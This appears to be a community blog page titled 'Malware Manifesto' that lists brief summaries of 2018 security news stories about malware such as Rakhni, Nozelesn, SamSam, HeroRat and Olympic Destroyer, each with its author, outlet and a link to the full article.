cancel
Showing results for 
Search instead for 
Did you mean: 

Malware Manifesto

46 Views
0 Comments

Rakhni.png

 

5th July, 2018 By Mohit Kumar The Hacker News

 

SummarySecurity researchers have discovered an interesting piece of malware that infects systems with either a cryptocurrency miner or ransomware, depending upon their configurations to decide which of the two schemes could be more profitable.

 

While ransomware is a type of malware that locks your computer and prevents you from accessing the encrypted data until you pay a ransom to get the decryption key required to decrypt your files, cryptocurrency miners utilize infected system's CPU power to mine digital currencies.

 


Article Link - Read more


Quote from Threat "Quote goes here"


 

Glossary Blog Back to the Malware Manifesto

79 Views
0 Comments

Nozelesn.png

 

2nd July, 2018 By Lawrence Abrams Bleeping Computer

 

SummaryA distribution campaign for a new ransomware called Nozelesn is currently underway that is targeting Poland. This campaign started July 2nd and we already have reports from victims in our forums and numerous cases have been spotted on ID Ransomware.

 

MalwareHunterTeam noticed numerous submissions to ID Ransomware this morning from Poland and a new topic created by victims in the BleepingComputer forums. A researcher at CERT Polska, the Computer Emergency Response Team for Poland, has also stated that they believe the ransomware is being distributed through a spam campaign pretending to be a DHL invoice.

 


Article Link - Read more


Quote from Threat "Quote goes here"


 

Glossary Blog Back to the Malware Manifesto

52 Views
0 Comments

OSX.Dummy.png

 

June 30, 2018  By Pierluigi Paganini Security Affairs

SummaryThe former NSA white hat hacker and malware researcher Patrick Wardle analyzed a new mac malware dubbed OSX.Dummy that targets the cryptocurrency community.

 
The popular experts decided to analyze the malicious code after the security researcher Remco Verhoef (@remco_verhoef) posted an interesting entry to SANS ‘InfoSec Handlers Diary Blog’ titled “Crypto community target of MacOS malware.”
 

“Previous days we’ve seen multiple MacOS malware attacks, originating within crypto related Slack or Discord chats groups by impersonating admins or key people. Small snippets are being shared, resulting in downloading and executing a malicious binary.” wrote Verhoef.

 

 

Article Link - Read more


Quote from Threat "Quote goes here"


 

Glossary Blog Back to the Malware Manifesto

55 Views
0 Comments

PROPagate.png

 

 

29th June, 2018 By Catalin Cimpanu Bleeping Computer

 

Security firm FireEye has detected that malware authors have deployed the PROPagate code injection technique for the first time inside a live malware distribution campaign.

 

PROPagate is a relatively new code injection technique discovered last November.

Back then, a security researcher found that an attacker could abuse the SetWindowSubclass API, a function of the Windows operating system that manages GUIs, to load and execute malicious code inside the processes of legitimate apps.

 

 

Article Link - Read more


Quote from Threat "Quote goes here"


 

Glossary Blog Back to the Malware Manifesto

77 Views
0 Comments

GZipDe.png

 

June 22, 2018  By Pierluigi Paganini 

 

SummaryGZipDe is downloader that is used by threat actors to fetch other payloads from a server controlled by attackers. The malware was detected after user from Afghanistan has uploaded a weaponized Word document on VirusTotal service, the document refers to the Shanghai Cooperation Organization Summit.

 

At the time it is not possible to attribute the malicious code to a specific actor, VirusTotal doesn’t share information about the source of the upload and the target of the attack was not disclosed, the researchers were only able to analyze the sample.

 

Article Link - Read more


Quote from Threat "Quote goes here"


 

Glossary Blog Back to the Malware Manifesto

80 Views
0 Comments

SamSam.png

 

27th April, 2018 By Tara Seals Threat Post

 

SummaryRansomware has lately lost its status as the queen of the cybercrime prom, but a new iteration of the nefarious SamSam extortion code shows that it can still make a bid to be sparkly and attention-getting.

 

The latest version of SamSam has taken the malware road less traveled, ditching widespread spam campaigns for unusually targeted, whole-company attacks. According to an analysis by Sophos, in a reversal of previous tactics, SamSam operators are now launching thousands of copies of the ransomware at once into individual organizations, each of which has been carefully selected.

 

Article Link - Read more


Quote from Threat "Quote goes here"


 

Glossary Blog Back to the Malware Manifesto

58 Views
0 Comments

MirageFox.png

 

18th June, 2018 By Eduard Kovacs on Security Week
 

SummaryA cyber-espionage group believed to be operating out of China has developed a new piece of malware that appears to be based on one of the first tools used by the threat actor.

 

The actor is known as APT15, Ke3chang, Mirage, Vixen Panda, Royal APT and Playful Dragon, and its tools are tracked by various cybersecurity companies as Mirage, BS2005, RoyalCLI, RoyalDNS, TidePool, BMW and MyWeb. The group has been known to target organizations in the defense, high tech, energy, government, aerospace, manufacturing and other sectors.

 

Article Link - Read more


Quote from Threat "Quote goes here"


 

Glossary Blog Back to the Malware Manifesto

57 Views
0 Comments

Zacinlo.png

 

18th June, 2018 By Catalin Cimpanu Bleeping Computer

 

SummaryWhen it was released back in 2015, one of the main perks of Windows 10 was the improved security features that made it harder for rootkits to get a foothold on Microsoft's new OS.

 

But three years later, security researchers from Romania-based antivirus vendor Bitdefender say they've discovered a new adware strain named Zacinlo that uses a rootkit component to gain persistence across OS reinstalls, a rootkit component that's even effective against Windows 10 installations.

 

In fact, researchers say that 90% of all Zacinlo's recent victims are Windows 10 users, showing that crooks intentionally designed their "product" to work against Microsoft's latest OS.

 

Article Link - Read more


Quote from Threat "Quote goes here"


 

Glossary Blog Back to the Malware Manifesto

61 Views
0 Comments

HeroRAT.png

 

19th June, 2018 By Pierluigi Paganini Security Affiars

 

SummaryMalware researchers from ESET have discovered a new strain of Android RAT, tracked as HeroRat, that leverages Telegram protocol for command and control, and data exfiltration.

 

HeroRat isn’t the first malware abusing Telegram protocol, past investigation reported similar threats like TeleRAT and IRRAT.

 

The new RAT has been in the wild at least since August 2017 and in March 2018 its source code was released for free on Telegram hacking channels allowing various threat actors to create their own variant.

 

 

Article Link - Read more


Quote from Threat "Quote goes here"


 

Glossary Blog Back to the Malware Manifesto

112 Views
0 Comments

OlympicDestroyer.png

 

19th June, 2018 By Catalin Cimpanu Bleeping Computer

 

SummaryOlympic Destroyer, the malware that hit Pyeongchang 2018 Winter Olympics, is still alive and infecting new victims, according to a report published earlier today by Russian antivirus vendor Kaspersky Labs. The company's security researchers say they've detected Olympic Destroyer infections across Europe in May and June 2018. New victims include financial organizations in Russia, and biological and chemical threat prevention laboratories in Europe and Ukraine.

 

Article Link - Read more


Quote from Threat "Quote goes here"


 

Glossary Blog Back to the Malware Manifesto

Quick Navigator